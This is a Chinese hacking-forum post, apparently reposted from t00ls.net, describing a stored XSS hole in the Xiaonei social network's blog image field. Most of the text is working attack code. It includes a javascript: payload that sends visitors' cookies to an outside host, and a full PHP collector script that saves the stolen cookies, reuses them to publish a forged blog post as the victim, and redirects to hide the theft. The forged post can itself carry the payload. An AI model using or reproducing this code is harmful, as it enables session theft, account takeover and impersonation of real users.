From:http://t00ls.net/viewthread.php?tid=1323&highlight= 校内网在发blog时对插入图片过滤不严格,存在xss漏洞. 在发blog时将插入图片URL写为如下代码即可触发:普通浏览复制代码打印代码 javascript:window.location.href=\’http://www.xxx.com/test.<SPAN class=t_tag xxxxx=tagshow(event) href="tag.php?name=php">php</SPAN>?cookie=\’+document.cookie javascript:window.location.href=\’http://www.xxx.com/test.php?cookie=\’+document.cookie test.php的作用是窃取cookie、伪造阅览者身份发一个blog、跳转到一个正常的日志,代码如下:普通浏览复制代码打印代码 <?php ob_start(); $url = \’blog.xiaonei.com\’; $cookie=$_GET[\’cookie\’]; $cookie1=$cookie."\\r\\n\\r\\n"; fputs(fopen(\’a.txt\’,\’a+\’),$cookie1); //cookie写入 a.txt //发一条伪造的日志,这条日志里面也可以插入恶意代码 $sock = fsockopen("$url", 80, $errno, $errstr, 30); if (!$sock) die("$errstr ($errno)\\n"); $data = "title=test by fly&body=test by fly&categoryId=0&blogControl=99&passwordProtedted=0&passWord=&blog_pic_id=&pic_path=&activity=&id=&relative_optpe="; fwrite($sock, "POST http://$url/NewEntry.do HTTP/1.1\\r\\n"); fwrite($sock, "Accept: */*\\r\\n"); fwrite($sock, "Referer: http://$url\\r\\n"); fwrite($sock, "Accept-Language: zh-cn\\r\\n"); fwrite($sock, "Content-Type: application/x-www-form-urlencoded\\r\\n"); fwrite($sock, "Accept-Encoding: gzip, deflate\\r\\n"); fwrite($sock, "User-Agent: Mozilla\\r\\n"); fwrite($sock, "Host: $url\\r\\n"); fwrite($sock, "Content-Length: ".strlen($data)."\\r\\n"); fwrite($sock, "Connection: Keep-Alive\\r\\n"); fwrite($sock, "Cache-Control: no-cache\\r\\n"); fwrite($sock, "Cookie:".$cookie."\\r\\n\\r\\n"); fwrite($sock, $data); $headers = ""; while ($str = trim(fgets($sock, 4096))) $headers .= "$str\\n"; echo "\\n"; $body = ""; while (!feof($sock)) $body .= fgets($sock, 4096); fclose($sock); //echo $body; //跳转到一个正常的日志 Header("Location: http://blog.xiaonei.com/GetEntry.do?id=xxxx&owner=xxxxx"); ob_end_flush(); ?>
